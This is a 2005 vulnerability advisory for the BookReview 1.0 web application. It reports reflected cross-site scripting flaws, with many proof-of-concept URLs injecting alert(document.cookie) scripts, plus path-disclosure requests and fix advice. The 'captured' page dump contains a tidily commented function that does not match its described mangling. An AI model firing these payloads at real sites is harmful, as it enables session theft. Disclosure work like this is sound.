
bookreviewXSS.txt

bookreviewXSS.txt
Posted Aug 14, 2005
Authored by Lostmon

BookReview 1.0 is susceptible to multiple reflected cross-site scripting flaws.

tags | exploit, xss
SHA-256 | 18b1301ed5452fdb6ef81f18d76a51f4d9525dfc0f5a7e56dfda44f95f976cf7

###################################################
BookReview 1.0 multiple variable XSS
vendor url:http://www.readersunite.com
advisory: http://lostmon.blogspot.com/2005/05/bookreview-10-multiple-variable-xss.html
vendor notified: yes    exploit available: yes
###################################################

BookReview contains a flaw that allows a remote cross-site scripting (XSS)
attack. The flaw exists because the application neither validates nor
output-encodes several request parameters before echoing them back into the
page, in several of its scripts. This lets an attacker craft a URL that
executes arbitrary script in a victim's browser within the trust relationship
between the browser and the server, leading to a loss of integrity. The proofs
of concept below use alert(document.cookie), so the demonstrated impact
includes session-cookie theft wherever the session cookie is not marked
HttpOnly.



############
versions:
############

BookReview 1.0 beta is confirmed vulnerable.


##############
solution
##############

No vendor fix was available at the time of disclosure. Until one exists, every
request parameter that is echoed into a page (at least isbn, node, chapters,
user and submit[string], plus the page/module name and the trailing path
segment under /suggestions/ and /directory/) should be HTML-encoded on output,
and ideally validated against its expected format on input (an ISBN, for
example, is only digits with an optional trailing X).


###########
timeline
###########

discovered: 27 April 2005
vendor notified: 17 May 2005 (via the vendor's web form)
disclosure: 26 May 2005



##################
proof of concepts
###################
All modules are dispatched through the 'index.php' script via the 'page' variable, e.g.
index.php?page=[NAME_OF_MODULE]&isbn=[ISBN]
where the module name can be 'add_review', 'add_contents' or others.

for example this url:
http://[victim]/index.php?page=add_contents&isbn=083081423X&chapters=25

is equivalent to this one, which reaches the module directly (each module is
also exposed as its own .htm entry point, as the proofs of concept below use):

http://[victim]/add_contents.htm?isbn=083081423X&chapters=25

So each vulnerable parameter can be attacked in two ways: through index.php
with the page variable, or directly through the module's own entry point.

##################
add_review.htm
#################

http://[victim]/add_review.htm?isbn=0801052319&node=%3Cscript%3Ealert(document.cookie)%3C/script%3E&review=true

http://[victim]/add_review.htm?isbn=0801052319%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Political_Science&review=true

http://[victim]/add_review.htm?isbn=0553278223&node="><script>alert(document.cookie)</script>&review=true

http://[victim]/add_review.htm?node=index&isbn=\\"><script>alert(document.cookie)</script>

###################
index.php
###################

http://[victim]/index.php?page=add_contents&isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&chapters=25

http://[victim]/index.php?page=add_contents&isbn=083081423X&chapters=25%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Note: the second payload (injected into the chapters parameter) also triggers a
server-side error whose output echoes fragments of the page's client-side
JavaScript (the tallyup / Roman-numeral / submitconfirm helpers shown below), a
minor source disclosure on top of the XSS. The dump is reproduced as captured;
its '<' characters appear to have been stripped by the HTML rendering, which is
why the tallyup loop header is truncated:


; function tallyup() { var count = 0; var book = 0; var part = 0; var
section = 0; var chapter = 0; var appendix = 0; var main_prefix = "";
var section_prefix = ""; for ( i=0; i var persian = '' + value; var
roman=""; var ronumdashes=""; var buffer=10-persian.length; while
(buffer>0) {persian="0"+persian;buffer--} var units=new
Array("","I","II","III","IV","V","VI","VII","VIII","IX"); var tens=new
Array("","X","XX","XXX","XL","L","LX","LXX","LXXX","XC"); var
hundreds=new Array("","C","CC","CCC","CD","D","DC","DCC","DCCC","CM");
var thousands=new
Array("","M","MM","MMM","MV","V","VM","VMM","VMMM","MX"); var
billionsdashes=new
Array("","=","==","===","==","=","==","===","====","==");
romandashes=billionsdashes[persian.substring(0,1)]; var
hundredmillionsdashes=new
Array("","=","==","===","==","=","==","===","====","==");
romandashes+=hundredmillionsdashes[persian.substring(1,2)]; var
tenmillionsdashes=new
Array("","=","==","===","==","=","==","===","====","==");
romandashes+=tenmillionsdashes[persian.substring(2,3)]; var
millionsdashes=new
Array("","_","__","___","_=","=","=_","=__","=___","_=");
romandashes+=millionsdashes[persian.substring(3,4)]; var
hundredthousandsdashes=new
Array("","_","__","___","__","_","__","___","____","__");
romandashes+=hundredthousandsdashes[persian.substring(4,5)]; var
tenthousandsdashes=new
Array("","_","__","___","__","_","__","___","____","__");
romandashes+=tenthousandsdashes[persian.substring(5,6)]; var
thousandsdashes=new Array("","","",""," _","_","_","_","_"," _");
romandashes+=thousandsdashes[persian.substring(6,7)];
roman=thousands[persian.substring(0,1)];
roman+=hundreds[persian.substring(1,2)];
roman+=tens[persian.substring(2,3)];
roman+=thousands[persian.substring(3,4)];
roman+=hundreds[persian.substring(4,5)];
roman+=tens[persian.substring(5,6)];
roman+=thousands[persian.substring(6,7)];
roman+=hundreds[persian.substring(7,8)];
roman+=tens[persian.substring(8,9)];
roman+=units[persian.substring(9,10)]; return roman; } function
alphabetise(number) { return String.fromCharCode(64+number); } ///
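/**
 * Form-submit handler: refuses submission until the "agree" checkbox is ticked.
 *
 * NOTE(review): this is purely a client-side convenience check. Anyone can
 * submit the request directly without running it, so the server must enforce
 * the agreement requirement independently.
 *
 * @returns {boolean} true to allow the submit, false to cancel it.
 */
function submitconfirm() {
  var agree = document.getElementById('agree');
  // Treat a missing checkbox like an unchecked one instead of throwing a
  // TypeError (an uncaught exception in an inline onsubmit handler would
  // presumably let the form submit anyway).
  if (!agree || !agree.checked) {
    alert("You must indicate your agreement to the terms and conditions by checking the box provided.");
    return false;
  }
  return true;
}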


###################
add_contents.htm
###################


http://[victim]/add_contents.htm?isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/suggest_category.htm?node=Agriculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/contact.htm?user=admin%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/add_booklist.htm?node=Agriculture_and_Aquaculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


#########################
others.
#########################

http://[victim]/add_url.htm?node=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/search.htm?page=search&submit%5Bstring%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author

http://[victim]/add_classification.htm?isbn=0830815961%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Gospels

http://[victim]/suggest_review.htm?node=Business_and_Economics"><SCRIPT>alert()</SCRIPT>

############################
possible local file inclusion (unconfirmed)
############################
Note: the two URLs below only demonstrate that the last path segment is
reflected unencoded into the page (XSS). Whether that segment is also used to
open a file on the server, which is what would make this a local file
inclusion, is not shown here and is left as a separate check.

http://[victim]/suggestions/"><script>alert(document.cookie)</script>.htm
http://[victim]/directory/">%3Cscript%3Ealert(document.cookie)%3C/script%3E.htm

http://[victim]/search.htm?page=search&submit%5Bstring%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author



################
path disclosure (an empty submit[string] value appears to produce an error message that reveals the server-side filesystem path):
################

http://[victim]/search.htm?page=search&submit%5Bstring%5D=&submit=Ok&submit%5Btype%5D=author

http://[victim]/search.htm?page=search&submit%5Bstring%5D=&submit%5Btype%5D=title


######################## End ########################

thnx to estrella to be my ligth
Thnx to icaro he is my Shadow !!!
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente
